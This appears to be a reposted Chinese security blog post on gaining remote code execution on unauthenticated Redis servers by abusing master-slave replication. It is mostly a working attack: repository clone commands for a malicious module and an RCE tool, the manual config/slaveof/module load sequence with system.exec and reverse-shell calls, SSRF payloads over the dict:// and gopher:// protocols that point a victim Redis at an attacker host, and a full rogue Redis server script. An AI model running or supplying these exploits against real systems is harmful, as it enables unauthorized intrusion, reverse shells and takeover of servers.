Redis未授權(quán)漏洞常見的漏洞利用方式：

• Windows下，絕對路徑寫webshell 、寫入啟動項。

• Linux下，絕對路徑寫webshell 、公私鑰認證獲取root權(quán)限 ?、利用contrab計劃任務反彈shell。

基于Redis主從復制的機制，可以完美無損的將文件同步到從節(jié)點。這就使得它可以輕易實現(xiàn)以上任何一種漏洞利用方式，而且存在著更多的可能性等待被探索。

---

一、Redis 主從復制一鍵自動化RCE

在Reids 4.x之后，Redis新增了模塊功能，通過外部拓展，可以實現(xiàn)在Redis中實現(xiàn)一個新的Redis命令，通過寫C語言編譯并加載惡意的.so文件，達到代碼執(zhí)行的目的。

通過腳本實現(xiàn)一鍵自動化getshell：

1、生成惡意.so文件，下載RedisModules-ExecuteCommand使用make編譯即可生成。

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommandcd RedisModules-ExecuteCommand/make

2、攻擊端執(zhí)行：python redis-rce.py -r 目標ip-p 目標端口 -L 本地ip -f 惡意.so

git clone https://github.com/Ridter/redis-rce.gitcd redis-rce/cp ../RedisModules-ExecuteCommand/src/module.so ./pip install -r requirements.txt python redis-rce.py -r 192.168.28.152 -p 6379 -L 192.168.28.137 -f module.so

二、Redis主從復制利用原理

首先，我們通過一個簡單的測試，來熟悉一下slave和master的握手協(xié)議過程：

1、監(jiān)聽本地1234端口

nc -lvvp 1234

2、將Redis服務器設置為從節(jié)點(slave)

slaveof 127.0.0.1 1234

3、使用nc模擬Redis主服務器，進行模擬Redis主從交互過程(紅色部分為slave發(fā)送的命令)：

以上，通過nc進行模擬Redis主從復制的交互過程，同理，如果構(gòu)建模擬一個Redis服務器，利用Redis主從復制的機制，那么就可以通過FULLRESYNC將任意文件同步到從節(jié)點。

三、Redis主從復制手動擋

手動操作過程記錄：

1、編寫腳本，構(gòu)造惡意Redis服務器，監(jiān)聽本地端口1234，加載exp.so。

python RogueServer.py --lport 1234 --exp exp.so

2、通過未授權(quán)訪問連入要攻擊的redis服務器。

執(zhí)行相關(guān)命令：

#設置redis的備份路徑為當前目錄 config set dir ./#設置備份文件名為exp.so，默認為dump.rdb config set dbfilename exp.so#設置主服務器IP和端口 slaveof 192.168.172.129 1234 #加載惡意模塊 module load ./exp.so#切斷主從，關(guān)閉復制功能 slaveof no one #執(zhí)行系統(tǒng)命令 system.exec 'whoami' system.rev 127.0.0.1 9999 #通過dump.rdb文件恢復數(shù)據(jù) config set dbfilename dump.rdb#刪除exp.so system.exec 'rm ./exp.so'#卸載system模塊的加載 module unload system

成功執(zhí)行系統(tǒng)命令：

四、SSRF+Redis 反彈shell

參照Redis手動getshell的過程，可輕易實現(xiàn)SSRF+Redis反彈shell。

以curl為例，漏洞代碼為ssrf.php:

<?php $ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_HEADER, 0);#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);curl_exec($ch);curl_close($ch);?>

環(huán)境準備：

• 模擬內(nèi)網(wǎng)未授權(quán)Redis服務器：192.168.172.131

• 模擬攻擊者機器：192.168.172.129，在攻擊者機器上構(gòu)建惡意Redis服務器，同時監(jiān)聽本地9999端口等待shell返回。

1、利用dict協(xié)議反彈shell

#查看當前redis的相關(guān)配置ssrf.php?url=dict://192.168.172.131:6379/info#設置備份文件名ssrf.php?url=dict://192.168.172.131:6379/config:set:dbfilename:exp.so#連接惡意Redis服務器ssrf.php?url=dict://192.168.172.131:6379/slaveof:192.168.172.129:1234#加載惡意模塊ssrf.php?url=dict://192.168.172.131:6379/module:load:./exp.so#切斷主從復制ssrf.php?url=dict://192.168.172.131:6379/slaveof:no:one#執(zhí)行系統(tǒng)命令 ssrf.php?url=dict://192.168.172.131:6379/system.rev:192.168.172.129:9999

2、利用gopher協(xié)議反彈shell

#設置文件名，連接惡意Redis服務器ssrf.php?url=gopher://192.168.172.131:6379/_config%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.172.129%25201234%250d%250aquit#加載exp.so，反彈shellssrf.php?url=gopher://192.168.172.131:6379/_module%2520load%2520./exp.so%250d%250asystem.rev%2520192.168.172.129%25209999%250d%250aquit

3、利用這兩種協(xié)議，都可以成功反彈shell。

附：簡單改寫的模擬Redis服務端腳本

import socketfrom time import sleepfrom optparse import OptionParserdef RogueServer(lport): resp = "" sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("0.0.0.0",lport)) sock.listen(10) conn,address = sock.accept() sleep(5) while True: data = conn.recv(1024) if "PING" in data: resp="+PONG"+CLRF conn.send(resp) elif "REPLCONF" in data: resp="+OK"+CLRF conn.send(resp) elif "PSYNC" in data or "SYNC" in data: resp = "+FULLRESYNC " + "Z"*40 + " 1" + CLRF resp += "$" + str(len(payload)) + CLRF resp = resp.encode() resp += payload + CLRF.encode() if type(resp) != bytes: resp =resp.encode() conn.send(resp) #elif "exit" in data: breakif __name__=="__main__": parser = OptionParser() parser.add_option("--lport", dest="lp", type="int",help="rogue server listen port, default 21000", default=21000,metavar="LOCAL_PORT") parser.add_option("-f","--exp", dest="exp", type="string",help="Redis Module to load, default exp.so", default="exp.so",metavar="EXP_FILE") (options , args )= parser.parse_args() lport = options.lp exp_filename = options.exp CLRF="\r\n" payload=open(exp_filename,"rb").read() print "Start listing on port: %s" %lport print "Load the payload: %s" %exp_filename ????RogueServer(lport)

總結(jié)

以上是生活随笔為你收集整理的完全复制一个dict_Redis主从复制getshell技巧的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。